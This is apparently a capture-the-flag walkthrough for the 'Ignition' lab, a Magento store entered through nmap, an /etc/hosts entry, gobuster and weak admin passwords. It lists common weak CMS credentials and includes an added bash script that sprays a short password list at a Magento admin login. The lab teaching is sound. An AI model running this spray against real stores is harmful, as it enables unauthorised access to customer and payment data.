⚠️ Legal Disclaimer: This content is for educational purposes only. Always ensure you have proper authorization before testing

Ignition presents a Magento e-commerce installation — one of the most widely deployed CMS platforms for online stores. The attack path combines service enumeration with Nmap, virtual host resolution, directory brute-forcing with Gobuster, and a login to the Magento backend with a weak, commonly chosen admin password. CMS admin panels protected by default or easily guessed credentials are a critical and recurring finding in web application assessments.

Tools: nmap · gobuster · browser · /etc/hosts  ·  Difficulty: Very Easy  ·  OS: Linux
01 — What You Will Learn
Skill | Why it matters
--- | ---
Virtual host resolution | Many web apps require a hostname; the bare IP returns a 302 or a blank page
Magento admin panel discovery | CMS-specific paths (/admin, /backend) are often unlinked but predictable
Default credential testing on CMS | Magento, WordPress, Drupal all have well-known admin paths and commonly reused weak passwords
Gobuster with CMS wordlists | Targeted wordlists speed up discovery on known CMS platforms
02 — Reconnaissance
Nmap scan
nmap -sV -sC -p- --min-rate 5000 10.129.x.x
Relevant output
PORT   STATE SERVICE VERSION
80/tcp open  http    nginx 1.14.2
|_http-title: Did not follow redirect to http://ignition.htb/

What you're seeing: Nmap's http-title script reports that the server answers a request to the IP with a redirect to http://ignition.htb/, a hostname that does not resolve publicly. Browsing directly by IP therefore just bounces you to a name your machine cannot look up. You need to map the hostname to the target IP in your local hosts file.

03 — Virtual Host Resolution
Add entry to /etc/hosts
echo "10.129.x.x ignition.htb" | sudo tee -a /etc/hosts

Note that sudo echo "..." >> /etc/hosts does not work: sudo elevates only the echo, while the >> redirection is opened by your unprivileged shell and fails with "Permission denied". Piping into sudo tee -a performs the append as root.

Now browse to http://ignition.htb/. The Magento storefront loads. Next, find the admin panel.

ℹ  Virtual hosting is standard in real-world web apps. The /etc/hosts trick is essential whenever Nmap or curl shows a redirect to a hostname that doesn't resolve publicly.
04 — Directory Enumeration
Gobuster scan against the hostname
gobuster dir \
  -u http://ignition.htb \
  -w /usr/share/seclists/Discovery/Web-Content/common.txt \
  -t 50
Relevant output
/admin   (Status: 200) [Size: 7092]
/contact (Status: 200)
/home    (Status: 200)

What you're seeing: /admin returns 200 — the Magento admin login panel is exposed. Navigate to http://ignition.htb/admin.

05 — Exploitation — Default Credentials

Magento ships without a factory-default admin password: the installer forces you to choose one. Its policy only requires at least seven characters mixing letters and digits, which is why predictable choices such as admin123 and qwerty123 turn up again and again. Test a short list of these before any brute-force attempt; a handful of requests is far less noisy than a wordlist.

Common Magento admin credentials
Username | Password
--- | ---
admin | admin
admin | admin123
admin | magento
admin | qwerty123

admin / qwerty123 grants access to the Magento admin dashboard. The flag is displayed on the dashboard.

✓ Submit the flag string to complete the machine.
⚠  The Magento admin panel gives full control over the e-commerce store: product listings, customer PII, order history and payment details, and, through extension installation and template editing, usually a path to server-side code execution. In a real engagement this is always a critical finding.
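The three steps above (hosts entry, admin page discovery, credential testing) as a small set of shell functions. This is an added example, not part of the original walkthrough. It assumes, as flagged in the comments, that the Magento admin login page carries a hidden form_key input, that the login form posts back to /admin/, and that a successful login answers with a 302 to the dashboard; the target IP is a placeholder.

```shell
#!/usr/bin/env bash
# Added example (not from the walkthrough): hosts entry -> Magento admin login.
# Assumptions, flagged where used: the admin login page contains
# <input name="form_key" type="hidden" value="...">, the form posts to /admin/,
# and a successful login returns a 302 whose Location points at the dashboard.

# Append "ip host" to a hosts file only if the host is not already present.
# Run with SUDO=sudo for the real /etc/hosts (tee -a does the privileged write).
ensure_hosts_entry() {
    local ip="$1" host="$2" file="${3:-/etc/hosts}"
    if grep -qE "[[:space:]]${host}([[:space:]]|$)" "$file" 2>/dev/null; then
        return 0
    fi
    printf '%s %s\n' "$ip" "$host" | ${SUDO:-} tee -a "$file" >/dev/null
}

# Pull the Magento form_key (anti-CSRF token) out of login page HTML on stdin.
# Assumption: the token is rendered as a hidden input named form_key.
extract_form_key() {
    sed -n 's/.*name="form_key"[^>]*value="\([A-Za-z0-9]*\)".*/\1/p' | head -n 1
}

# Decide from raw response headers whether Magento accepted the login.
# Heuristic (assumption): success is a 302 to a URL containing "dashboard";
# a rejected login re-renders the form with HTTP 200.
login_succeeded() {
    printf '%s\n' "$1" | grep -qiE '^Location:.*dashboard'
}

# Try one username/password against http://$host/admin/. Returns 0 on success,
# 1 on a rejected login, 2 when no form_key could be found (wrong host?).
# A per-call cookie jar is used because Magento ties the form_key to the session.
try_magento_login() {
    local host="$1" user="$2" pass="$3" jar html key headers
    jar=$(mktemp)
    html=$(curl -s -c "$jar" -b "$jar" "http://${host}/admin/")
    key=$(printf '%s\n' "$html" | extract_form_key)
    if [ -z "$key" ]; then
        echo "no form_key on http://${host}/admin/ (does ${host} resolve?)" >&2
        rm -f "$jar"
        return 2
    fi
    headers=$(curl -s -o /dev/null -D - -c "$jar" -b "$jar" \
        --data-urlencode "login[username]=${user}" \
        --data-urlencode "login[password]=${pass}" \
        --data-urlencode "form_key=${key}" \
        "http://${host}/admin/")
    rm -f "$jar"
    if login_succeeded "$headers"; then
        echo "OK   ${user}:${pass}"
        return 0
    fi
    echo "FAIL ${user}:${pass}"
    return 1
}

# Walk the short credential list from section 05, stopping at the first hit.
spray_defaults() {
    local host="$1" user pass rc
    while read -r user pass; do
        rc=0
        try_magento_login "$host" "$user" "$pass" || rc=$?
        if [ "$rc" -eq 0 ]; then return 0; fi
        if [ "$rc" -eq 2 ]; then return 2; fi
    done <<'EOF'
admin admin
admin admin123
admin magento
admin qwerty123
EOF
    return 1
}

# End-to-end run only when a target IP is supplied, so sourcing the file is safe:
#   SUDO=sudo IGNITION_IP=10.129.x.x bash ignition.sh
if [ -n "${IGNITION_IP:-}" ]; then
    ensure_hosts_entry "$IGNITION_IP" ignition.htb /etc/hosts
    spray_defaults ignition.htb
fi
```

Keep the credential list short and stop on the first success: four POSTs against a login form are defensible on an engagement, a full wordlist is not, and Magento can lock the admin account after repeated failures.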
06 — CMS Admin Panel Default Paths
Every CMS below sets the admin password during installation; the last column lists the weak values that most often survive that step.

CMS | Default admin path | Commonly seen weak credentials
--- | --- | ---
Magento | /admin, /backend | admin / admin123, admin / qwerty123
WordPress | /wp-admin, /wp-login.php | admin / (set on install)
Drupal | /user/login, /admin | admin / admin
Joomla | /administrator | admin / admin
PrestaShop | /admin (renamed with a random suffix on install) | admin / (set on install)
OpenCart | /admin | admin / admin
07 — Key Takeaways
Virtual host enumeration is a critical step that's easy to miss. Many web applications simply don't work when accessed by IP — always check Nmap output for redirect hostnames and add them to /etc/hosts.
Concept | Real-world relevance
--- | ---
Hostname in redirect | Nmap's http-title script captures redirect targets; never ignore them
Magento admin exposure | On production systems /admin should be IP-restricted, moved to a non-default path, or placed behind a WAF
CMS weak creds | Every CMS has a short list of commonly reused admin passwords; test them before any brute-force
Admin panel = full app control | In Magento (and most CMS), admin access almost always leads to code execution, via theme or template editors, extension upload or file managers